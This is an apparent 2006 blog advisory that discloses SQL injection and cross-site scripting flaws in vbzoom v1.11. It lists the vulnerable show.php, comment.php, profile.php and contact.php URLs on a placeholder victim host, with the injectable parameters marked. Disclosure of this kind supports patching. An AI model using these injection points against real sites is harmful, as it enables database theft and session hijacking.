ecoestadistica.com

lunes, marzo 06, 2006

SQL injection & XSS en vbzoom v1.11

vbzoom v1.11

Web Site:http://www.vbzoom.com

Versions: V1.11

== SQL Injection ==

http://www.victima.com/vz/show.php?UserID=1&MainID=1&SubjectID=[SQL]

http://www.victima.com/vz/show.php?UserID=1&MainID=[SQL]&SubjectID=1

==== XSS ====

http://www.victima.com/vz/comment.php?UserID='>XSS

http://www.victima.com/vz/profile.php?UserID=1&UserName='>XSS

http://www.victima.com/vz/contact.php?UserID='>XSS

ecoestadistica.com